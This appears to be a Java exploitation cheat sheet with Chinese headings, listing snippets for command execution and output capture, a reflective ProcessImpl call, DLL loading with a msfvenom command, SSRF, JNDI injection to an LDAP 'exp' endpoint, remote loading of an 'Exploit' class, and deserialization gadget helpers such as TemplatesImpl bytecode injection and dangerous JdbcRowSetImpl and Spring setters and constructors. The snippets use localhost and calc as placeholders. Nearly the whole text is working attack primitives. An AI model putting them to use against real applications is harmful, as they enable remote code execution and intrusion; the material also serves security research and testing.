命令执行1
Runtime.getRuntime().exec("calc");
命令执行2
new ProcessBuilder("cmd", "/c calc").start();
命令执行3
String [] cmd={"cmd.exe","/c","calc"};
Class processimpl=Class.forName("java.lang.ProcessImpl");
java.lang.reflect.Method m1=processimpl.getDeclaredMethod("start", String[].class, java.util.Map.class, String.class, ProcessBuilder.Redirect[].class, boolean.class);
m1.setAccessible(true);
Process p=(Process) m1.invoke(processimpl,cmd,null,null,null,false);
加载动态链接库
NativeLibLoader.loadLibrary("calc");
//windows会默认增加.dll后缀,linux会增加.so
//linux gcc编译即可,windows如下
//msfvenom -p windows/x64/exec cmd="calc.exe" exitfunc=thread -f dll -o calc.dl
命令回显1
Process process = Runtime.getRuntime().exec("cmd.exe /c "+"ipconfig");
InputStream in = process.getInputStream();
BufferedReader br = new BufferedReader(new InputStreamReader(in));
String line;
StringBuilder sb = new StringBuilder();
while ((line = br.readLine()) != null) {
sb.append(line).append("\n");
}
String str = sb.toString();
System.out.println(str);
命令回显2
String cmd = "whoami";
boolean isWin = java.lang.System.getProperty("os.name").toLowerCase().contains("win");
String[] cmds = isWin ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};
InputStream in = Runtime.getRuntime().exec(cmds).getInputStream();
Scanner s = new Scanner(in).useDelimiter("\\a");
String output = s.hasNext() ? s.next() : "";
System.out.println(output);
SSRF
new URL("http://127.0.0.1/").openStream();
new JEditorPane().setPage("http://127.0.0.1/");
文件写入1
new FileOutputStream("1.txt").write("test".getBytes());
文件写入2
FileWriter fw = new FileWriter(new File("test.txt"));
fw.write("test");
fw.close();
文件读取1
FileInputStream inputFromFile = new FileInputStream("Calc.class");
byte[] bs = new byte[inputFromFile.available()];
inputFromFile.read(bs);
System.out.println(Arrays.toString(bs));
System.out.println(new String(bs));
文件读取2
//形成SSRF,可读目录
String url = "file:///D:/";
InputStream input = new URL(url).openStream();
byte[] bs = new byte[input.available()];
input.read(bs);
System.out.println(Arrays.toString(bs));
System.out.println(new String(bs));
JNDI注入
new javax.naming.InitialContext().lookup("ldap://127.0.0.1:1389/exp");
远程class加载
URL[] urls = new URL[]{new URL("http://127.0.0.1/")};
URLClassLoader.newInstance(urls).loadClass("Exploit").newInstance();
序列化/反序列化1
ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("1.ser"));
objectOutputStream.writeObject(queue);
objectOutputStream.close();
ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream("1.ser"));
objectInputStream.readObject();
序列化/反序列化2
ByteArrayOutputStream out = new ByteArrayOutputStream();
ObjectOutputStream oos = new ObjectOutputStream(out);
oos.writeObject(queue);
String base64 = java.util.Base64.getEncoder().encodeToString(out.toByteArray());
System.out.println(base64);
System.out.println(base64.replace("+", "%2B"));
System.out.println(Arrays.toString(bs));
ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(out.toByteArray()));
Object o = (Object)ois.readObject();
兼容性base64
public byte[] base64_decode(String string) throws Exception {
byte[] bytes;
try {
try {
Object decoder = Class.forName("java.util.Base64").getMethod("getDecoder").invoke(null);
bytes = (byte[]) Class.forName("java.util.Base64$Decoder").getMethod("decode",String.class).invoke(decoder, string);
} catch (Exception e) {
Object decoder = Class.forName("java.util.Base64").getMethod("getMimeDecoder").invoke(null);
bytes = (byte[]) Class.forName("java.util.Base64$Decoder").getMethod("decode",String.class).invoke(decoder, string);
}
} catch (Exception e) {
bytes = (byte[]) Class.forName("sun.misc.BASE64Decoder").getMethod("decodeBuffer",String.class).invoke(Class.forName("sun.misc.BASE64Decoder").newInstance(), string);
}
return bytes;
}
public static String base64_encode(byte[] bs) throws Exception {
String base64;
try {
base64 = (String) Class.forName("sun.misc.BASE64Encoder").getMethod("encodeBuffer",byte[].class).invoke(Class.forName("sun.misc.BASE64Encoder").newInstance(), bs);
} catch (Exception e) {
Object encoder = Class.forName("java.util.Base64").getMethod("getEncoder").invoke(null);
base64 = (String) Class.forName("java.util.Base64$Encoder").getMethod("encodeToString",byte[].class).invoke(encoder, bs);
}
return base64.replace("\r\n", "");
}
getFieldValue
public static Object getFieldValue(Object obj, String fieldName) throws Exception {
Field field = obj.getClass().getDeclaredField(fieldName);
//这里取不到就需要找父类
field.setAccessible(true);
return field.get(obj);
}
setFieldValue
public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
Field field = obj.getClass().getDeclaredField(fieldName);
field.setAccessible(true);
field.set(obj, value);
}
查看sUID
ObjectStreamClass osc1 = ObjectStreamClass.lookup(bsh.XThis.class);
System.out.println(osc1.getSerialVersionUID());
修改sUID
TemplatesImpl obj = new TemplatesImpl();
java.lang.reflect.Field sUID = obj.getClass().getDeclaredField("serialVersionUID");
sUID.setAccessible(true);
Field modifiersField = Field.class.getDeclaredField("modifiers");
modifiersField.setAccessible(true);
modifiersField.setInt(sUID, sUID.getModifiers() & ~Modifier.FINAL);
sUID.set(obj, -3070939614679977597L);
System.out.print(getFieldValue(obj, "serialVersionUID"));
有危害的setter
JdbcRowSetImpl obj = new JdbcRowSetImpl();
obj.setDataSourceName("ldap://127.0.0.1:1389/exp");
obj.setAutoCommit(true);
oracle.jdbc.rowset.OracleJDBCRowSet obj2 = new OracleJDBCRowSet();
obj2.setDataSourceName("ldap://127.0.0.1:1389/exp");
obj2.setCommand("123");
com.sun.management.jmx.TraceListener obj3 = new com.sun.management.jmx.TraceListener();
obj3.setFile("1.php::$INDEX_ALLOCATION");
new JEditorPane().setPage("http://127.0.0.1/");
new org.apache.batik.swing.JSVGCanvas().setURI("http://127.0.0.1/");
有危害的getter
java.net.URL url = new URL("http://127.0.0.1");
url.getContent();
com.sun.rowset.JdbcRowSetImpl obj = new JdbcRowSetImpl();
obj.setDataSourceName("ldap://127.0.0.1:1389/exp");
obj.getDatabaseMetaData();
Constructor<?> ctor = Class.forName("com.sun.jndi.ldap.LdapAttribute").getDeclaredConstructor(new Class<?>[]{String.class});
ctor.setAccessible(true);
javax.naming.directory.Attribute obj2 = (Attribute) ctor.newInstance("id");
setFieldValue(obj2, "baseCtxURL", "ldap://127.0.0.1:1389");
setFieldValue(obj2, "rdn", new CompositeName("exp"));
obj2.getAttributeDefinition();
FileInputStream inputFromFile = new FileInputStream("D:\\Downloads\\workspace\\test\\bin\\test\\TemplatesImplcmd.class");
byte[] bs = new byte[inputFromFile.available()];
inputFromFile.read(bs);
TemplatesImpl obj3 = new TemplatesImpl();
setFieldValue(obj3, "_bytecodes", new byte[][]{bs});
setFieldValue(obj3, "_name", "TemplatesImpl");
setFieldValue(obj3, "_tfactory", new TransformerFactoryImpl());
obj3.getOutputProperties();
oracle.jdbc.rowset.OracleCachedRowSet obj4 = new OracleCachedRowSet();
obj4.setDataSourceName("ldap://127.0.0.1:1389/exp");
obj4.getConnection();
有危害的单String参数构造函数
org.springframework.context.support.ClassPathXmlApplicationContext obj = new ClassPathXmlApplicationContext("http://127.0.0.1");
org.springframework.context.support.FileSystemXmlApplicationContext obj2 = new FileSystemXmlApplicationContext("http://127.0.0.1");
java.io.FileOutputStream obj3 = new FileOutputStream("test");